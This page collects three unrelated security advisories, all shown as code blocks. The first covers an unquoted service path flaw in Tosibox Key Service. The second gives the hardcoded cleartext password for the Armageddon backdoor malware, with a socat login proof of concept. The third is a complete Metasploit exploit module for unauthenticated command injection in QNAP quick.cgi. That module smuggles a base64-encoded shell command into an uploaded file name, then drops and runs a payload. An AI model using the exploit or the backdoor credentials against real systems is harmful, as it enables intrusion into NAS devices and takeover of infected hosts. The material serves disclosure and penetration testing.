<pre><code><br />Tosibox Key Service 3.3.0 Local Privilege Escalation<br /><br /><br />Vendor: Tosibox Oy<br />Product web page: https://www.tosibox.com<br />Affected version: <=3.3.0<br /><br />Summary: TOSIBOX® SoftKey is a software that enables a secure connection<br />between your computer and one or more TOSIBOX® Nodes, giving you full<br />visibility and control over the network devices connected to the Node.<br /><br />Desc: The application suffers from an unquoted search path issue impacting<br />the service 'Tosibox Key Service' for Windows deployed as part of Tosibox<br />software application. This could potentially allow an authorized but non-privileged<br />local user to execute arbitrary code with elevated privileges on the system.<br />A successful attempt would require the local user to be able to insert their<br />code in the system root path undetected by the OS or other security applications<br />where it could potentially be executed during application startup or reboot.<br />If successful, the local user's code would execute with the elevated privileges<br />of the application.<br /><br />Tested on: Windows 10 Home 64 bit (build 9200)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2024-5812<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5812.php<br /><br /><br />30.01.2024<br /><br />--<br /><br /><br />C:\Users\ews>sc qc "Tosibox Key Service"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: Tosibox Key Service<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Tosibox\bin\TosiboxKeyService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Tosibox Key Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\Users\ews><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/68d135936512e88cc0704b90bb3839e0.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Armageddon.r<br />Vulnerability: Hardcoded Cleartext Credentials<br />Description: The malware listens on TCP port 5859 and requires authentication. The password "KOrUPtIzEre" is stored in cleartext within the PE file at offset 0x4635f. Connecting to the backdoor returns the value "1" then enter the password.<br />Family: Armageddon<br />Type: PE32 <br />MD5: 68d135936512e88cc0704b90bb3839e0<br />Vuln ID: MVID-2024-0670<br />Dropped files: IP-logs.txt<br />Disclosure: 02/22/2024<br /><br /><br />Exploit/PoC:<br />root@kali:/home/kali# socat - TCP4:x.x.x.x:5859<br />1 KOrUPtIzEre<br />1 DESKTOP-2C4IJHO VICTIM Wed<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'QNAP QTS and QuTS Hero Unauthenticated Remote Code Execution in quick.cgi',<br /> 'Description' => %q{<br /> There exists an unauthenticated command injection vulnerability in the QNAP operating system known as QTS and<br /> QuTS hero. QTS is a core part of the firmware for numerous QNAP entry and mid-level Network Attached Storage<br /> (NAS) devices, and QuTS hero is a core part of the firmware for numerous QNAP high-end and enterprise NAS devices.<br /><br /> The vulnerable endpoint is the quick.cgi component, exposed by the device’s web based administration feature.<br /> The quick.cgi component is present in an uninitialized QNAP NAS device. This component is intended to be used<br /> during either manual or cloud based provisioning of a QNAP NAS device. Once a device has been successfully<br /> initialized, the quick.cgi component is disabled on the system.<br /><br /> An attacker with network access to an uninitialized QNAP NAS device may perform unauthenticated command<br /> injection, allowing the attacker to execute arbitrary commands on the device.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'sfewer-r7', # CVE discovery, MSF module, Rapid7 Blog<br /> 'Spencer McIntyre', # Assistance<br /> 'jheysel-r7' # Docs<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-47218'],<br /> ['URL', 'https://www.qnap.com/en/security-advisory/qsa-23-57'],<br /> ['URL', 'https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed']<br /> ],<br /> 'DisclosureDate' => '2024-02-13',<br /> 'Platform' => %w[unix linux],<br /> 'Arch' => [ARCH_CMD],<br /> 'Privileged' => true,<br /> 'Targets' => [ [ 'Default', {} ] ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 80,<br /> 'SSL' => false,<br /> 'FETCH_WRITABLE_DIR' => '/mnt/update'<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => '/cgi-bin/quick/quick.cgi',<br /> 'vars_get' => {<br /> 'func' => Rex::Text.rand_text_alphanumeric(8)<br /> }<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res<br /><br /> return CheckCode::Safe('Received HTTP status code: 404. This indicates the device is not vulnerable.') if res.code == 404<br /><br /> return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200<br /><br /> # This is the content data we get back from a vulnerable system (testing firmware TS-X64_20230926-5.1.2.2533):<br /><br /> # <?xml version="1.0" encoding="UTF-8"?><br /> # <Storage><br /> # <Result>failure</Result><br /> # <Errcode>801</Errcode><br /> # <Errmsg><br /> # No Parameter.<br /> # </Errmsg><br /> # </Storage><br /><br /> return Exploit::CheckCode::Detected if res.body.include? '<Result>failure</Result>'<br /><br /> CheckCode::Unknown<br /> end<br /><br /> def exploit<br /> # XXX: the command injection has a limit of 127 characters, so we drop our payload to a file and then execute that file.<br /> bootstrap_file = Rex::Text.rand_text_alphanumeric(8)<br /><br /> bootstrap_script = [<br /> '#!/bin/bash',<br /> payload.encoded<br /> ].join("\n")<br /><br /> upload_file(bootstrap_file, bootstrap_script)<br /> register_file_for_cleanup("#{datastore['FETCH_WRITABLE_DIR']}/#{bootstrap_file}")<br /> execute_command("bash #{datastore['FETCH_WRITABLE_DIR']}/#{bootstrap_file}")<br /> end<br /><br /> def execute_command(cmd)<br /> cmd_injection_filename = "\"$($(echo -n #{Base64.strict_encode64(cmd)}|base64 -d))\""<br /><br /> upload_file(Rex::Text.uri_encode(cmd_injection_filename), Rex::Text.rand_text_alphanumeric(8))<br /> register_file_for_cleanup("#{datastore['FETCH_WRITABLE_DIR']}/#{cmd_injection_filename}")<br /> end<br /><br /> def upload_file(file_name, file_data)<br /> if file_name.length > 127<br /> fail_with(Failure::BadConfig, "The upload file name is too long (#{file_name.length}), must be < 128 bytes.")<br /> end<br /><br /> data = Rex::MIME::Message.new<br /> data.add_part(file_data, 'text/plain', 'binary', "form-data; #{Rex::Text.rand_text_alphanumeric(8)}=\"#{Rex::Text.rand_text_alphanumeric(8)}\"; #{Rex::Text.rand_text_alphanumeric(8)}=\"#{file_name}\"")<br /><br /> send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => '/cgi-bin/quick/quick.cgi',<br /> 'vars_get' => {<br /> 'func' => 'switch_os',<br /> 'todo' => 'uploaf_firmware_image'<br /> },<br /> 'headers' => {<br /> 'User-Agent' => 'Mozilla Macintosh'<br /> },<br /> 'ctype' => "multipart/form-data;boundary=\"#{data.bound}\"",<br /> 'data' => data.to_s<br /> )<br /> end<br />end<br /></code></pre>